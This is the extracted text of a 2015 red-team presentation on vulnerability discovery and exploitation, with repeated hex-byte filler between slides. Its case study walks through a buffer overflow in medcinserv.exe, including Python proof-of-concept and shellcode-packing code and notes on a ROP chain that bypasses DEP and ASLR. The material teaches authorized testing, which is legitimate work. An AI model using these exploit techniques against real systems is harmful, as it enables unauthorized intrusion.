software vulnerability discovery and exploitation during red team assessments
TRANSCRIPT
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Software Vulnerability Discovery & Exploitation During Red Team
Assessments
Ryan Wincey [email protected]
9/30/2015
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Background
• Long term red team assessments
• Persistence with remote access tools
• Looking for alternative means of network propagation or privilege escalation
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Identify Targets
• Look for applications that are listening on sockets or running at a higher privilege level
• Windowsnetstat -ano | findstr LISTEN
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Identify Targets
• Look for applications that are listening on sockets or running at a higher privilege level
• Windowstasklist /v | findstr <pid>
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Identify Targets
• Look for applications that are listening on sockets or running at a higher privilege level
• Linuxnetstat -anop | grep LISTENps -ef | grep <pid>
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Static Analysis
• Reverse Engineering Software– IDA Pro/Hexrays– Hopper– Other
• Target Binary
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Static Analysis
• Helpful bug hunting tips
– Identify areas where data is introduced from outside of the application
• Command Line Parameters• Socket Reads• File Reads• Environment Variables• i.e. read, gets, fread, fgets, recv, recv_from
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Static Analysis
• Helpful bug hunting tips
– Trace those inputs to parsing functions; look for interesting functions and memory operations• strcpy, strcat• sprintf, printf• memcpy• system• any custom string or memory copies
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Dynamic Analysis
Checklist• In order to perform dynamic analysis, we will need to
ensure that the application will run in our test environment.
• Tips for getting the application to run.– Zip up support files in the same directory. ( 7za, zip )– Listdlls.exe, ldd - loaded libraries– Handle.exe, /proc/<pid> - open files– Procmon.exe – identify registry keys – Read log files – track down missing files or registry settings
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Analyzing Process
Memory• Comparing the running process environment
to your test environment.
• Windowsprocdump.exe /accepteula -ma <pid> <dump file>
• Linuxgdb attach <pid>
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Crash Dumps
• In the event that you crash the application and want to collect crash dumps.
• WindowsHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps
DumpFolderDumpCountDumpTypeCustomDumpFlags
• Linuxulimit –c unlimited
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
• Identify target and binary location
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Identify target and binary location
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
• Static analysis using IDA Pro and HexRays decompiler.
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
• Static analysis using IDA Pro and HexRays decompiler.
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
• Static analysis using IDA Pro and HexRays decompiler.
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Locate additional dependencies
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Locate additional dependencies
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Locate additional dependencies
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Query service details in registry
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Setup as nearly identical environment
• Operating system
• File system
• Service registration
• Debugging tools
• Scripting support
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Set breakpoint on our vulnerable function
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Set breakpoint on our vulnerable function
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• POC Skeleton
– Define Protocol
[ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ]
– Choose Implementation
Python, Ruby, Powershell, C
– Code up boiler plate stuff / Use template
Socket connect, send, recv,
Formatting
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• POC Skeleton
if len (sys.argv) == 3: (progname, host, port) = sys.argvelse: print 'Usage: {0} host port'.format (sys.argv[0]) exit (1)
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)csock.connect ( (host, int(port)) )csock.settimeout(1)
print "[+] connected to server."
#Try thingsi = 238
data = “1,” * 1000
print "[+] sending data."send( i, len(data) + 6, data)
csock.close()print "[+] goodbye"
def send(type, pack_len, data=None):
if pack_len < 6 or pack_len > 0x3d090: print "Length must be between 6 and 0x3d090 bytes."
#Set the type buf = struct.pack('>h', type)
#Send length, must be less than 0x3d090, can be negative buf += struct.pack('>i', pack_len)
#Send data if pack_len > 0: buf += data try: #Send data csock.send(buf) except: pass
Integer Array
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• We own EIP
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Our target environment, Windows 7 SP1, has DEP, ASLR, and SafeSEH on all OS libraries.• Medcinserv.exe, doesn’t have any built in protections
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Bypass DEP by changing the execution permissions of the stack dynamically.• Change permissions using ROP chain composed of gadgets from the medcinserv binary.• Bypass ASLR because ROP gadgets in medcinserv binary are static.• NULL bytes are allowed since it’s an integer array buffer overflow.
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• ROP gadgets generated for VirtualAlloc• Resolve VirtualAlloc using GetModuleHandle and GetProcAddress
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Exploit Design Structure
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Shellcode to String Array Function
def add_shellcode( sc ): global data
#Determine the iterator shellcode_len = len(sc) iterator = shellcode_len / 4 if shellcode_len % 4 > 0: iterator +=1
counter = 0 for i in range( int( iterator ) ): entry = sc[ (i*4) : (i*4)+4 ]
#Make sure length is four bytes len_entry = len(entry) if len( entry ) < 4: entry += "\x90" * ( 4 - len_entry) data += str(struct.unpack("<I", entry )[0]) + ","
counter += 1
return counter
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
DEMO
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Test Exploit
• Test in as nearly identical environment as possible
• Non-critical systems, preferably when users are away
• Make sure to get permission
• Get more shellz
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89Reporting
• US CERT
• MITRE
• NIST
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89
QUESTIONS?